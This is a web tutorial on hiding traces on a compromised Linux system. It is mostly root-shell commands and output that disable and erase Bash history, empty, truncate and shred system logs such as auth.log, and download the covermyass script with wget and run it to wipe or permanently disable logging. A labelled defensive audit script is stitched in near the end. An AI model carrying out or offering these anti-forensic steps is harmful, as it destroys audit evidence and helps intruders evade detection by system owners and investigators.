RuCore.NET – English Version

How to clean up logs and history on Linux systems to hide your traces and go unnoticed.





In order to show you the basics of hiding your traces, we will first compromise the target and then learn some methods used to remove the Bash history, clear the logs and stay hidden after using a Linux system.

Step 1: Compromising the target

The first thing we need to do is exploit the target. We can use command injection to abuse the way the server handles OS commands and get a shell.

We also want to upgrade our new shell to a fully interactive one. This will simplify the overall operation and also gives us Tab completion and terminal history. After that we can escalate our privileges to root so that we can make better use of the system without being noticed.

Step 2: Create a hidden directory that is easy to delete

After we have root access we can create a hidden directory to develop and store any scripts or files. This won't fool anyone but a novice administrator, but another layer of caution certainly won't hurt. First let's find all the world-writable directories with the following command:

root@target:/# find / -perm -222 -type d 2>/dev/null

/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

We can create a hidden directory with the mkdir command by adding a dot before the name:

root@target:/# mkdir /dev/shm/.secret

If we now list the contents of /dev/shm, nothing will appear:

root@target:/# ls -l /dev/shm/

total 0

But when we use the -a switch to list all files and directories, it shows up:

root@target:/# ls -la /dev/shm/

total 0
drwxrwxrwt 3 root root 60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secret

And to remove the directory as soon as we are done on the machine, use the rmdir command:

root@target:/# rmdir /dev/shm/.secret/

Step 3: Delete the Bash history

Bash stores a list of the commands used in the current session, so it is important to clear it to hide your traces. We can view the current history using the history command:

root@target:/# history

1 cd /
2 ls
3 find / -perm -222 -type d 2>/dev/null
4 cd /dev/shm/
5 cd /
6 mkdir /dev/shm/.secret
7 ls -l /dev/shm/
8 ls -la /dev/shm/
9 ls
10 rmdir /dev/shm/.secret/
11 history

Commands are written to the file named by the HISTFILE environment variable, which is usually .bash_history. We can echo it to see the location:

root@target:/# echo $HISTFILE

/root/.bash_history

We can use the unset command to remove the variable:

root@target:/# unset HISTFILE

Now when we echo it again, nothing appears:

root@target:/# echo $HISTFILE

We can also make sure that the command history is not stored by sending it to /dev/null. Set the variable:

root@target:/# HISTFILE=/dev/null

Or do the same with the export command:

root@target:/# export HISTFILE=/dev/null

The history will now be sent to /dev/null:

root@target:/# echo $HISTFILE

/dev/null

We can set the number of commands to be saved in the current session to 0 using the HISTSIZE variable:

root@target:/# HISTSIZE=0

You can also use export:

root@target:/# export HISTSIZE=0

We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set its value to 0:

root@target:/# HISTFILESIZE=0

Or with export:

root@target:/# export HISTFILESIZE=0

The set command can also be used to change shell options. To disable the history option, use the following command:

root@target:/# set +o history

And to turn it back on:

root@target:/# set -o history

Similarly, the shopt command can be used to change shell options. To disable history, use the following command:

root@target:/# shopt -ou history

And to turn it back on:

root@target:/# shopt -os history

When you execute commands on the target system, you can sometimes avoid saving them in the history by running the command with a leading space:

root@target:~#  cat /etc/passwd

This technique does not work all the time and depends on the system.

We can also simply clear the history using the -c switch:

root@target:~# history -c

To make sure the change is written to disk, use the -w switch:

root@target:~# history -w

This only clears the history of the current session. To make sure that the history is cleared when you exit the session, the following command is useful:

root@target:/# cat /dev/null > ~/.bash_history && history -c && exit

We can also use the kill command to exit the session without saving the history:

root@target:/# kill -9 $$

Step 4: Clear log files

In addition to the Bash history, the log files must also be cleared to go unnoticed. Here are some common log files and what they contain:

/var/log/auth.log: authentication logs
/var/log/cron.log: cron job logs
/var/log/maillog: mail logs
/var/log/httpd: Apache logs

Of course, we can simply delete the log with the rm command:

root@target:/# rm /var/log/auth.log

But this will probably raise red flags, so it is better to empty the file rather than delete it completely. We can use truncate to reduce its size to 0:

root@target:/# truncate -s 0 /var/log/auth.log

Note that truncate is not present on all systems.

We can do the same by echoing an empty string into the file:

root@target:/# echo '' > /var/log/auth.log

The redirection operator alone will also empty the file:

root@target:/# > /var/log/auth.log

We can also send /dev/null into it:

root@target:/# cat /dev/null > /var/log/auth.log

Or use the tee command:

root@target:/# true | tee /var/log/auth.log

We can also use the dd command to write nothing to the log file:

root@target:/# dd if=/dev/null of=/var/log/auth.log

0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

The shred command can be used to overwrite a file with random data:

root@target:/# shred /var/log/auth.log

We can even add -zu, which makes a final pass of zeros to hide the shredding and then removes the file:

root@target:/# shred -zu /var/log/auth.log

Step 5: Use a tool to make sure things are erased

To increase the probability that any activity on the target goes undetected, we can use a tool to make sure that everything is erased. Covermyass is a script that automates most of the processes we have already seen, including clearing log files and disabling Bash history.

We can grab the script from GitHub using wget (if we have Internet access on the target; otherwise it must be transferred manually):

root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

Change to a writable directory and use chmod to make it executable:

root@target:/tmp# chmod +x covermyass

Then we can run it:

root@target:/tmp# ./covermyass

Welcome to Cover my ass tool

Select an option :

1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool

>

There is a prompt with several options to choose from. Let's select the first one to clear the logs:

> 1

[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

We can also disable Bash and auth history with option 2:

> 2

[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library

Permenently disabled bash log.

And in case you need to clean up in a hurry, just append now to the command:

root@target:/tmp# ./covermyass now

[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.
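From the other side of the fence, here is an added example (not part of the original article and not covermyass code) of a POSIX shell audit that checks a host for the exact indicators the steps above leave behind: zero-byte or /dev/null-linked logs, a .bash_history linked to /dev/null, and rc files that set HISTSIZE=0 or HISTFILE=/dev/null. The log and home directories are parameters, and make_fixture builds a constructed directory so the audit runs offline.

```shell
#!/bin/sh
# Added example (not from the original article or covermyass): audit a host
# for the anti-forensic indicators described in Steps 3 to 5.

# audit_log_tamper LOGDIR HOMEDIR
# Prints one finding per line; returns 0 if clean, 1 if anything was found.
audit_log_tamper() {
    logdir="$1"; homedir="$2"; findings=0
    for f in auth.log messages kern.log wtmp; do
        p="$logdir/$f"
        [ -e "$p" ] || [ -L "$p" ] || continue        # log not kept on this host
        if [ -L "$p" ] && [ "$(readlink "$p")" = /dev/null ]; then
            echo "TAMPER: $p is a symlink to /dev/null"; findings=$((findings+1))
        elif [ ! -s "$p" ]; then
            echo "SUSPECT: $p is zero bytes (truncated?)"; findings=$((findings+1))
        fi
    done
    hist="$homedir/.bash_history"
    if [ -L "$hist" ] && [ "$(readlink "$hist")" = /dev/null ]; then
        echo "TAMPER: $hist is a symlink to /dev/null"; findings=$((findings+1))
    fi
    # rc files that persistently disable history (what covermyass option 2 does)
    for rc in .bashrc .bash_profile .profile; do
        [ -f "$homedir/$rc" ] || continue
        if grep -Eq '^[[:space:]]*(export[[:space:]]+)?(HISTFILE=/dev/null|HISTSIZE=0|HISTFILESIZE=0)|set \+o history|shopt -ou history' "$homedir/$rc"; then
            echo "TAMPER: $homedir/$rc disables shell history"; findings=$((findings+1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Constructed fixture (not real system paths) so the audit can run offline:
# one intact log, one truncated log, history linked to /dev/null, HISTSIZE=0.
make_fixture() {
    d=$(mktemp -d); mkdir -p "$d/log" "$d/home"
    printf 'Jun 19 13:41:00 host sshd[1]: Accepted password for root\n' > "$d/log/messages"
    : > "$d/log/auth.log"
    ln -s /dev/null "$d/home/.bash_history"
    printf 'export HISTSIZE=0\n' > "$d/home/.bashrc"
    echo "$d"
}

# Stand-alone run against the fixture; on a real host use /var/log and /root.
FIXTURE=$(make_fixture)
audit_log_tamper "$FIXTURE/log" "$FIXTURE/home" || echo "findings above need investigation"
```

A zero-byte auth.log is only a suspicion (log rotation produces the same thing), so the hit should be correlated with the file's mtime, the rotation schedule and any remote syslog copy before drawing conclusions.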

Today we have learned various methods used to hide traces and how to remain unnoticed on a compromised machine. We looked at how to disable and delete Bash history, how to clean up log files, and used the Covermyass tool to ensure that our activities on the target were erased.

